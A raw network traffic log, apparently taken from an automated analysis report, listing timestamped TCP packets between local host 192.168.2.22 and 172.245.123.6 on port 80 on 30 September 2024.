                                                                                  Sep 30, 2024 10:12:31.970793009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970807076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970814943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970990896 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971077919 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971090078 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971100092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971110106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971122026 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971126080 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971136093 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971138000 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971143007 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971148968 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971160889 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971163988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971174955 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971182108 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971184969 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971190929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971201897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971203089 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971209049 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971211910 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971220970 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971223116 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971229076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971237898 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971249104 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971249104 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971266031 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971266985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971278906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971287966 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971290112 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971298933 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971298933 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971309900 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971321106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971322060 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971327066 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971332073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971342087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971350908 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971358061 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971362114 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971368074 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971371889 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971379042 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971394062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971395016 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971407890 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971420050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971421957 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971434116 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971436024 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971442938 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971446991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971457005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971467972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971467972 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.062875986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.062891960 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.062911987 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.062932014 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.062963009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.062982082 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.062992096 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063021898 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063066959 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063076973 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063086987 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063101053 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063112020 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063112020 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063119888 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063122988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063131094 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063153982 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063155890 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063168049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063177109 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063178062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063186884 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063201904 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063210964 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063231945 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063241959 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063251972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063261986 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063271999 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063273907 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063285112 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063292980 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063296080 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063302994 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063307047 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063312054 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063323975 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063338995 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063357115 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063379049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.063399076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.063406944 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152317047 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152333021 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152344942 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152389050 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152412891 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152502060 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152513027 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152523994 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152534962 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152549982 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152560949 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152575970 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152628899 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152641058 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152651072 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152662039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152664900 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152672052 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152682066 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152683020 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152688980 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152702093 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152724028 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152789116 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152801991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152812004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152822971 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152832031 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152832985 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152842045 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152853012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152853012 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152858973 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152863979 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152877092 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152883053 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152909040 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152934074 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152945042 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152956009 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152968884 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.152971029 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.152977943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153019905 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153126955 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153136969 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153146029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153156996 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153166056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153176069 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153179884 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153179884 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153179884 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153187037 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153197050 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153197050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153208971 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153211117 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153248072 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153258085 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153274059 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153284073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153311968 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153321028 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153415918 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153426886 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153436899 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153446913 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153450966 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153456926 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153466940 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153469086 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153476954 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153481960 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153487921 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153497934 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153501987 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153508902 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153508902 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153536081 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153568029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153578997 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153599024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153599024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153759003 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153776884 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153788090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153799057 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153800011 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153810978 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153820992 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153820992 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153831005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153841972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153851986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153851986 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153851986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153865099 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153877974 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153903961 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153906107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153917074 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153928041 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153939009 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153940916 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153949022 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153954029 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153959990 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153970957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.153970957 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.153984070 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154006004 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154047012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154057026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154079914 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154089928 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154210091 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154222012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154232979 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154243946 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154246092 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154264927 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154273987 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154378891 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154388905 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154400110 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154409885 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154416084 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154421091 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154428959 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154437065 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154463053 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154556990 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154567957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154587030 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154597044 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.154743910 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154755116 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154766083 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154777050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.154782057 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245357990 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245368958 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245373011 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245379925 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245383978 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245395899 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245407104 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245428085 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245450974 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245462894 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245474100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.245500088 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.245599031 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334728003 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334743977 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334753990 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334799051 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334799051 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334805012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334815025 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334825039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334835052 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334842920 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334851980 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334861994 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334863901 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334872961 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334873915 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334883928 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334896088 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334901094 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334903002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334912062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334920883 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334923029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334939003 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334959030 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.334970951 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334981918 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.334991932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335001945 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335005999 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335014105 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335014105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335031033 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335031986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335041046 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335045099 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335059881 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335062981 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335069895 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335071087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335093021 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335103035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335136890 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335146904 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335156918 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335167885 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335176945 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335179090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335189104 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335191011 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335200071 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335210085 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335218906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335227013 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335231066 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335233927 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335239887 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335242987 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335264921 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335275888 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335328102 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335354090 CEST8049167172.245.123.6192.168.2.22
